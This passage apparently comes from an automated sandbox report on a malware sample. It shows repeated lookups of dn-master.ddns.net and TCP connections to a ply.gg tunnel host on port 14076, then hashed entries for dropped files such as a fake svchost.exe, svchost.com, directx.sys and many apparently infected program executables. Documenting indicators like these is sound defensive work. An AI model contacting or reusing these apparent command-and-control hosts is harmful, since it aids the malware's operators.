| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 147.185.221.21:14076 | edition-ages.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 147.185.221.21:14076 | edition-ages.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 147.185.221.21:14076 | edition-ages.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 147.185.221.21:14076 | edition-ages.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 147.185.221.21:14076 | edition-ages.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 147.185.221.21:14076 | edition-ages.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 147.185.221.21:14076 | edition-ages.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 147.185.221.21:14076 | edition-ages.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 147.185.221.21:14076 | edition-ages.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
Files
memory/4980-1-0x00000000008C0000-0x00000000008D8000-memory.dmp
memory/4980-0-0x00007FFCB9F53000-0x00007FFCB9F55000-memory.dmp
memory/4980-2-0x00007FFCB9F50000-0x00007FFCBAA11000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a2tr4lqp.u5r.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1128-3-0x000001EE7DA80000-0x000001EE7DAA2000-memory.dmp
memory/1128-13-0x00007FFCB9F50000-0x00007FFCBAA11000-memory.dmp
memory/1128-14-0x00007FFCB9F50000-0x00007FFCBAA11000-memory.dmp
memory/1128-15-0x00007FFCB9F50000-0x00007FFCBAA11000-memory.dmp
memory/1128-18-0x00007FFCB9F50000-0x00007FFCBAA11000-memory.dmp
memory/1128-19-0x00007FFCB9F50000-0x00007FFCBAA11000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4edbf85a94dd6b386139be2f7d5aaa89 |
| SHA1 | 0018a978887327677c2746745ba4424e374dd5a5 |
| SHA256 | 6da335e321a645cbd6cdb303e3ca060685d99d313c4b01ba0c89685031bfe213 |
| SHA512 | c2d122dbb35e5fc2d053182ab62aca53e6cd4eb91ac1a8016067ed7f03fc627eec08f484d6dc8459f82b54685b7b072aacdbbd981766d8e20439ea86a2f10a94 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e93f56f55c1dfa4bd560580c7bd6a541 |
| SHA1 | 055d421cc2d8c42ae2e9cb6c4eee12958873b420 |
| SHA256 | 9faf055d5fe07bf2f4eface6fe0922b367218cb53aa0f3caba21d3f65eb1e134 |
| SHA512 | 417e75ddb1940005a7bcd6d07a0d56b639be120b7c0bd079fc692724b919728ed5cd0af420630f66be273ec64fe0a2a9fa589bf4d77d36a9a999ec9b45888e0e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a7cc007980e419d553568a106210549a |
| SHA1 | c03099706b75071f36c3962fcc60a22f197711e0 |
| SHA256 | a5735921fc72189c8bf577f3911486cf031708dc8d6bc764fe3e593c0a053165 |
| SHA512 | b9aaf29403c467daef80a1ae87478afc33b78f4e1ca16189557011bb83cf9b3e29a0f85c69fa209c45201fb28baca47d31756eee07b79c6312c506e8370f7666 |
memory/4980-58-0x00007FFCB9F53000-0x00007FFCB9F55000-memory.dmp
memory/4980-59-0x000000001C1D0000-0x000000001C1DC000-memory.dmp
memory/4980-60-0x00007FFCB9F50000-0x00007FFCBAA11000-memory.dmp
C:\Users\Admin\AppData\Roaming\svchost.exe
| MD5 | f9cf3c741b2aab438659db28ff3dcade |
| SHA1 | abea5f0af31f38d2df86735b0ac57a508eb36b68 |
| SHA256 | b7f8446df81a5d91809436661acf8ee4fdd1c897312a494ca01fca94f5352d5b |
| SHA512 | ff86f97a2bb44b001367655afcbb33b928c07a5ec7ce0c9449d9997c4f2b0550363c5bbc8f0a3615dc7cd6aa9f04d018b81c1e98338575bed0910a20fcd9a6eb |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log
| MD5 | 2ff39f6c7249774be85fd60a8f9a245e |
| SHA1 | 684ff36b31aedc1e587c8496c02722c6698c1c4e |
| SHA256 | e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced |
| SHA512 | 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1 |
C:\Users\Admin\AppData\Local\Temp\vydcyu.exe
| MD5 | 254666784d03bbd8f029bd8d88d3d41b |
| SHA1 | dcb17862f5d22e9c39377d6f78495114c316a7dd |
| SHA256 | 564c5ef5e868901f5885470cef5b59ec6602b6a3a35d7ab584229b3579e4a7f3 |
| SHA512 | 3798625361587fa3d43cb13699f85c81cf33733e8478292099af8a388367c007a7efb85d9f4f98ba1ef44151b9c98bf7363e72103e85773519700fab69d2e8c8 |
C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe
| MD5 | 3b89419d6b4718395cb519a37485446b |
| SHA1 | 63f3812ed13a4e73e86467ef56df2f97e0fba6c9 |
| SHA256 | 1dc89ba9c53d0fdc2914bb4ed20511cf0ba05af6cd077c1c6cf32e7102ee9283 |
| SHA512 | 0ac55b2c25ed8d1861f72e48da574f8d06d1995aa5d7f8946fcffdadddeff9711abf7ba2f19c2470e1b15dba84c20a10ca2ed3fd2eb7791df5eefad790bfde04 |
C:\Users\Admin\AppData\Local\Temp\file2.exe
| MD5 | 6d99d0214c500f0f6a3d8d875c62a845 |
| SHA1 | 1bb9a82931a027e1e126ad8f09de74e33f0cf78e |
| SHA256 | 83849fca840eb3a22c21e99d6ee68094ef26516e96683be924254dae5ff732ed |
| SHA512 | c2f5ef89b5c03daa2837b8634fd7cf0a815ae7b0d88d3d9e9f64e06ef8e750d2f72f7b7d425479b8d5f60bfad6beb2feae1b24922e139a56ee1c76dba12bad79 |
C:\Windows\svchost.com
| MD5 | c817913ce06741e802c67800c51ab3f0 |
| SHA1 | dc7ec5f541bb22dea7d85c1d6bf3707e2decff43 |
| SHA256 | 702b40dee8857696f30e841ba3a9bf3a0aa8056b965837b5a398e820419bc38b |
| SHA512 | 64bb1a959479d3c354b157598ad7479ced1429ec9dcd625de7651e1da639d604dc2b0f8db6e81cd9dc5c523a46bd1e940cd08239a59ce6e9547ee2c4e6bf8f56 |
C:\Windows\directx.sys
| MD5 | 9d8a0e8ca788b7b141fc3751433f204b |
| SHA1 | bc0bda41471fb02229fe2e0ba97aca361719b34c |
| SHA256 | 32781f5ca41cd824cb763f00790f066d80c861de0c63c3b6536e4694c7cdc5a9 |
| SHA512 | afc9e5b081b39bf882f3bd27e258321c2d3834d51798b5be27842e4e779f4e82cb387905d04fec22acd4ef669391dcbcc6c5f3bbf7fc3186f44de18d14bf127d |
C:\Users\Admin\AppData\Local\Temp\file3.exe
| MD5 | 0579600d0819edb97fdd1772f3df7681 |
| SHA1 | 95f7d1657052ebaa63123869279467db0b45749f |
| SHA256 | caef73ad12439b2bd4c14718f1f26f95c7163daea96bfa4c5d4ae580b1e34dcf |
| SHA512 | 2e3dad36facab2776cf912405baa454a834cc1da91a606a90868c3a4b7dbed9959872ec36479caa1e08598bb512ad6dbf943b09c7c7b841c47804882e6c08c90 |
C:\Windows\directx.sys
| MD5 | 0279821af57bb9da94ffcb49bb9a7087 |
| SHA1 | 7e5eca4e1376b04dbaaff66eaec2657e84e2bf9d |
| SHA256 | 6c6eaf71243f650e03b9f5143afec70b862d2c610ae55f5933733f2b1df5f474 |
| SHA512 | 09f2cafd433af0e6936ee1da12da9747faadea6ca31d19223d15e2923ef774f206991cafb3562ea02af699ef427eea79103fd47521aee4254499f488c58fb25f |
memory/1012-148-0x0000000000400000-0x000000000041B000-memory.dmp
memory/3940-149-0x0000000000750000-0x0000000000751000-memory.dmp
C:\Windows\directx.sys
| MD5 | 8e966011732995cd7680a1caa974fd57 |
| SHA1 | 2b22d69074bfa790179858cc700a7cbfd01ca557 |
| SHA256 | 97d597793ec8307b71f3cfb8a6754be45bf4c548914367f4dc9af315c3a93d9b |
| SHA512 | 892da55e0f4b3ff983019c11d58809fdcb8695d79c617ddc6251791308ee013bf097d1b4a7541140f7a01c56038a804974a4f154cc1b26e80e5cf5c07adf227c |
memory/2088-163-0x0000000000400000-0x000000000041B000-memory.dmp
memory/4728-206-0x0000000000400000-0x000000000041B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\file5.empty
| MD5 | 1ee80a3ca8c142c985758203c13c6a22 |
| SHA1 | a06c8b3471f21d8405e6c2e70c62055b7902de0d |
| SHA256 | 0359552b4a82ea8e7c3e3fc8d529f3b4f0af3cd8050d728ee49025c24aeb0197 |
| SHA512 | 51c9545ce13f72af1c25385345a63f905d590a16a7ec8d4da4e3f0ba53a62c2ce0f129a4bd60b7a6536d40632852d84b59561409c99292d5e2dfaac867efb246 |
C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroRd32.exe
| MD5 | 8ffc3bdf4a1903d9e28b99d1643fc9c7 |
| SHA1 | 919ba8594db0ae245a8abd80f9f3698826fc6fe5 |
| SHA256 | 8268d3fefe8ca96a25a73690d14bacf644170ab5e9e70d2f8eeb350a4c83f9f6 |
| SHA512 | 0b94ead97374d74eaee87e7614ddd3911d2cf66d4c49abbfd06b02c03e5dd56fd00993b4947e8a4bcd9d891fa39cab18cc6b61efc7d0812e91eb3aea9cd1a427 |
C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADelRCP.exe
| MD5 | 576410de51e63c3b5442540c8fdacbee |
| SHA1 | 8de673b679e0fee6e460cbf4f21ab728e41e0973 |
| SHA256 | 3f00404dd591c2856e6f71bd78423ed47199902e0b85f228e6c4de72c59ddffe |
| SHA512 | f7761f3878775b30cc3d756fa122e74548dfc0a27e38fa4109e34a59a009df333d074bf14a227549ae347605f271be47984c55148685faac479aeb481f7191db |
C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\32BITM~1.EXE
| MD5 | 92dc0a5b61c98ac6ca3c9e09711e0a5d |
| SHA1 | f809f50cfdfbc469561bced921d0bad343a0d7b4 |
| SHA256 | 3e9da97a7106122245e77f13f3f3cc96c055d732ab841eb848d03ac25401c1bc |
| SHA512 | d9eefb19f82e0786d9be0dbe5e339d25473fb3a09682f40c6d190d4c320cca5556abb72b5d97c6b0da4f8faefdc6d39ac9d0415fdf94ebcc90ecdf2e513c6a31 |
C:\PROGRA~2\Adobe\ACROBA~1\Reader\LOGTRA~1.EXE
| MD5 | 8c753d6448183dea5269445738486e01 |
| SHA1 | ebbbdc0022ca7487cd6294714cd3fbcb70923af9 |
| SHA256 | 473eb551101caeaf2d18f811342e21de323c8dd19ed21011997716871defe997 |
| SHA512 | 4f6fddefc42455540448eac0b693a4847e21b68467486376a4186776bfe137337733d3075b7b87ed7dac532478dc9afc63883607ec8205df3f155fee64c7a9be |
C:\PROGRA~2\Adobe\ACROBA~1\Reader\FULLTR~1.EXE
| MD5 | 4ddc609ae13a777493f3eeda70a81d40 |
| SHA1 | 8957c390f9b2c136d37190e32bccae3ae671c80a |
| SHA256 | 16d65f2463658a72dba205dcaa18bc3d0bab4453e726233d68bc176e69db0950 |
| SHA512 | 9d7f90d1529cab20078c2690bf7bffab5a451a41d8993781effe807e619da0e7292f991da2f0c5c131b111d028b3e6084e5648c90816e74dfb664e7f78181bc5 |
C:\PROGRA~2\Adobe\ACROBA~1\Reader\Eula.exe
| MD5 | 5791075058b526842f4601c46abd59f5 |
| SHA1 | b2748f7542e2eebcd0353c3720d92bbffad8678f |
| SHA256 | 5c3ef3ec7594c040146e908014791dd15201ba58b4d70032770bb661b6a0e394 |
| SHA512 | 83e303971ed64019fde9e4ba6f6e889f8fb105088490dfa7dcf579a12baff20ef491f563d132d60c7b24a4fd3cac29bd9dc974571cd162000fae8fba4e0e54fb |
C:\PROGRA~2\Adobe\ACROBA~1\Reader\Browser\WCCHRO~1\WCCHRO~1.EXE
| MD5 | 9dfcdd1ab508b26917bb2461488d8605 |
| SHA1 | 4ba6342bcf4942ade05fb12db83da89dc8c56a21 |
| SHA256 | ecd5e94da88c653e4c34b6ab325e0aca8824247b290336f75c410caa16381bc5 |
| SHA512 | 1afc1b95f160333f1ff2fa14b3f22a28ae33850699c6b5498915a8b6bec1cfc40f33cb69583240aa9206bc2ea7ab14e05e071275b836502a92aa8c529fc1b137 |
C:\PROGRA~2\Adobe\ACROBA~1\Reader\arh.exe
| MD5 | cce8964848413b49f18a44da9cb0a79b |
| SHA1 | 0b7452100d400acebb1c1887542f322a92cbd7ae |
| SHA256 | fe44ca8d5050932851aa54c23133277e66db939501af58e5aeb7b67ec1dde7b5 |
| SHA512 | bf8fc270229d46a083ced30da6637f3ca510b0ce44624a9b21ec6aacac81666dffd41855053a936aa9e8ea6e745a09b820b506ec7bf1173b6f1837828a35103d |
C:\Windows\directx.sys
| MD5 | 016bcbec29654abd8191fae00146a7ec |
| SHA1 | 1693427056ba3ae65ebcef448b6c45eef88f835f |
| SHA256 | 26510fc1074153ae66bd366f78a7ee34d3eb62de89e26fc91a8637db472498a9 |
| SHA512 | 430efc57f48f6a2392670b8c01ca7b431587132973430a584aa3b45138f88e70a29f6a2e0402449bc7a069811b43d76e600c87a1578c04234c9cd3eee465447d |
memory/116-250-0x0000000000F30000-0x0000000000F31000-memory.dmp
memory/1084-251-0x0000000000400000-0x000000000041B000-memory.dmp
C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\AdobeARM.exe
| MD5 | d47ed8961782d9e27f359447fa86c266 |
| SHA1 | d37d3f962c8d302b18ec468b4abe94f792f72a3b |
| SHA256 | b1ec065f71cc40f400e006586d370997102860504fd643b235e8ed9f5607262a |
| SHA512 | 3e33f2cdf35024868b183449019de9278035e7966b342ba320a6c601b5629792cbb98a19850d4ca80b906c85d10e8503b0193794d1f1efa849fa33d26cff0669 |
C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jaureg.exe
| MD5 | ce82862ca68d666d7aa47acc514c3e3d |
| SHA1 | f458c7f43372dbcdac8257b1639e0fe51f592e28 |
| SHA256 | c5a99f42100834599e4995d0a178b32b772a6e774a4050a6bb00438af0a6a1f3 |
| SHA512 | bca7afd6589c3215c92fdaca552ad3380f53d3db8c4b69329a1fa81528dd952a14bf012321de92ad1d20e5c1888eab3dd512b1ac80a406baccc37ee6ff4a90dc |
C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\java.exe
| MD5 | 9a8d683f9f884ddd9160a5912ca06995 |
| SHA1 | 98dc8682a0c44727ee039298665f5d95b057c854 |
| SHA256 | 5e2e22ead49ce9cc11141dbeebbe5b93a530c966695d8efc2083f00e6be53423 |
| SHA512 | 6aecf8c5cb5796d6879f8643e20c653f58bad70820896b0019c39623604d5b3c8a4420562ab051c6685edce60aa068d9c2dbb4413a7b16c6d01a9ac10dc22c12 |
C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE
| MD5 | cbd96ba6abe7564cb5980502eec0b5f6 |
| SHA1 | 74e1fe1429cec3e91f55364e5cb8385a64bb0006 |
| SHA256 | 405b8bd647fa703e233b8b609a18999abe465a8458168f1daf23197bd2ea36aa |
| SHA512 | a551001853f6b93dfbc6cf6a681820af31330a19d5411076ff3dbce90937b3d92173085a15f29ebf56f2ef12a4e86860ac6723ebc89c98ea31ea7a6c7e3d7cdc |
C:\PROGRA~2\COMMON~1\Oracle\Java\JAVAPA~1\javaws.exe
| MD5 | 64c5c00694478ff090e483eebcd3d7a1 |
| SHA1 | af47eaff535970e6178c1bc29a6eb68b874dcfe8 |
| SHA256 | a9884e9141ca6f3d5f9a4fe781b104064f3b801d81263058f23b079c945a12f3 |
| SHA512 | 4df0b6e2f215ef1dd206e9c14eb233e6896ad9b846290edb344947db8f9bcaec5c39777c9dac33aee85433ed3178188c7622ba8ff0b4d2462a80820f338ca495 |
C:\PROGRA~2\COMMON~1\Oracle\Java\JAVAPA~1\javaw.exe
| MD5 | 892cf4fc5398e07bf652c50ef2aa3b88 |
| SHA1 | c399e55756b23938057a0ecae597bd9dbe481866 |
| SHA256 | e2262c798729169f697e6c30e5211cde604fd8b14769311ff4ea81abba8c2781 |
| SHA512 | f16a9e4b1150098c5936ec6107c36d47246dafd5a43e9f4ad9a31ecab69cc789c768691fa23a1440fae7f6e93e8e62566b5c86f7ed6bb4cfe26368149ea8c167 |
C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~1.EXE
| MD5 | 7429ce42ac211cd3aa986faad186cedd |
| SHA1 | b61a57f0f99cfd702be0fbafcb77e9f911223fac |
| SHA256 | d608c05409ac4bd05d8e0702fcf66dfae5f4f38cbae13406842fa5504f4d616f |
| SHA512 | ee4456877d6d881d9904013aabecb9f2daf6fc0ec7a7c9251e77396b66a7f5a577fe8544e64e2bb7464db429db56a3fe47c183a81d40cc869d01be573ab5e4c1 |
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\COOKIE~1.EXE
| MD5 | 5e08d87c074f0f8e3a8e8c76c5bf92ee |
| SHA1 | f52a554a5029fb4749842b2213d4196c95d48561 |
| SHA256 | 5d548c2cc25d542f2061ed9c8e38bd5ca72bddb37dd17654346cae8a19645714 |
| SHA512 | dd98d6fa7d943604914b2e3b27e1f21a95f1fe1feb942dd6956e864da658f4fbd9d1d0cf775e79ceaae6a025aafd4e633763389c37034134bd5245969bec383e |
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\IDENTI~1.EXE
| MD5 | 301d7f5daa3b48c83df5f6b35de99982 |
| SHA1 | 17e68d91f3ec1eabde1451351cc690a1978d2cd4 |
| SHA256 | abe398284d90be5e5e78f98654b88664e2e14478f7eb3f55c5fd1c1bcf1bebee |
| SHA512 | 4a72a24dec461d116fe8324c651913273ccaa50cb036ccdacb3ae300e417cf4a64aa458869b8d2f3b4c298c59977437d11b241d08b391a481c3226954bba22e4 |
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~3.EXE
| MD5 | eb008f1890fed6dc7d13a25ff9c35724 |
| SHA1 | 751d3b944f160b1f77c1c8852af25b65ae9d649c |
| SHA256 | a9b7b9155af49d651b092bb1665447059f7a1d0061f88fa320d4f956b9723090 |
| SHA512 | 9cfe3480f24bf8970ad5773cb9df51d132ee90ada35cbf8ec1222e09a60ae46b2ff4b96862fea19085b1c32f93c47c69f604589fa3f4af17e5d67bef893b6bf1 |
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\BHO\IE_TO_~1.EXE
| MD5 | 7c73e01bd682dc67ef2fbb679be99866 |
| SHA1 | ad3834bd9f95f8bf64eb5be0a610427940407117 |
| SHA256 | da333c92fdfd2e8092f5b56686b94f713f8fa27ef8f333e7222259ad1eb08f5d |
| SHA512 | b2f3398e486cde482cb6bea18f4e5312fa2db7382ca25cea17bcba5ab1ff0e891d59328bc567641a9da05caca4d7c61dc102289d46e7135f947ce6155e295711 |
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\PWAHEL~1.EXE
| MD5 | 5c78384d8eb1f6cb8cb23d515cfe7c98 |
| SHA1 | b732ab6c3fbf2ded8a4d6c8962554d119f59082e |
| SHA256 | 9abd7f0aa942ee6b263cdc4b32a4110ddb95e43ad411190f0ea48c0064884564 |
| SHA512 | 99324af5f8fb70a9d01f97d845a4c6999053d6567ba5b80830a843a1634b02eaf3c0c04ced924cf1b1be9b4d1dbbcb95538385f7f85ad84d3eaaa6dcdebcc8a6 |
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\MSEDGE~1.EXE
| MD5 | a5d9eaa7d52bffc494a5f58203c6c1b5 |
| SHA1 | 97928ba7b61b46a1a77a38445679d040ffca7cc8 |
| SHA256 | 34b8662d38e7d3d6394fa6c965d943d2c82ea06ba9d7a0af4f8e0571fb5a9c48 |
| SHA512 | b6fdc8389bb4d736d608600469be6a4b0452aa3ea082f9a0791022a14c02b8fb7dcd62df133b0518e91283094eaba2be9318316f72d2c4aae6286d3e8686e787 |
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe
| MD5 | 5119e350591269f44f732b470024bb7c |
| SHA1 | 4ccd48e4c6ba6e162d1520760ee3063e93e2c014 |
| SHA256 | 2b3aa9642b291932ba7f9f3d85221402a9d27078f56ef0e9c6bca633616e3873 |
| SHA512 | 599b4ec673169d42a348d1117737b4ad4d7539574153df5a5c7689130c9ac5ff5cd00f3c8ec39adf32ff2b56be074081efcabb6456272c649703c3ea6cdaded4 |
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\NOTIFI~1.EXE
| MD5 | 27543bab17420af611ccc3029db9465a |
| SHA1 | f0f96fd53f9695737a3fa6145bc5a6ce58227966 |
| SHA256 | 75530dc732f35cc796d19edd11ae6d6f6ef6499ddcf2e57307582b1c5299554c |
| SHA512 | a62c2dd60e1df309ec1bb48ea85184914962ba83766f29d878569549ca20fca68f304f4494702d9e5f09adedc2166e48ee0bc1f4a5d9e245c5490daf15036bea |
C:\PROGRA~2\Google\Update\1336~1.371\GOF5E2~1.EXE
| MD5 | d9a290f7aec8aff3591c189b3cf8610a |
| SHA1 | 7558d29fb32018897c25e0ac1c86084116f1956c |
| SHA256 | 41bed95cb1101181a97460e2395efebb0594849e6f48b80a2b7c376ddf5ce0ea |
| SHA512 | b55ab687a75c11ba99c64be42ad8471576aa2df10ce1bb61e902e98827e3a38cd922e365751bd485cac089c2bd8bccf939a578da7238506b77fe02a3eb7994c6 |
C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~2.EXE
| MD5 | d9186b6dd347f1cf59349b6fc87f0a98 |
| SHA1 | 6700d12be4bd504c4c2a67e17eea8568416edf93 |
| SHA256 | a892284c97c8888a589ea84f88852238b8cd97cc1f4af85b93b5c5264f5c40d4 |
| SHA512 | a29cc26028a68b0145cb20ec353a4406ec86962ff8c3630c96e0627639cf76e0ea1723b7b44592ea4f126c4a48d85d92f930294ae97f72ecc95e3a752a475087 |
C:\PROGRA~2\Google\Update\1336~1.371\GOBD5D~1.EXE
| MD5 | 87bb2253f977fc3576a01e5cbb61f423 |
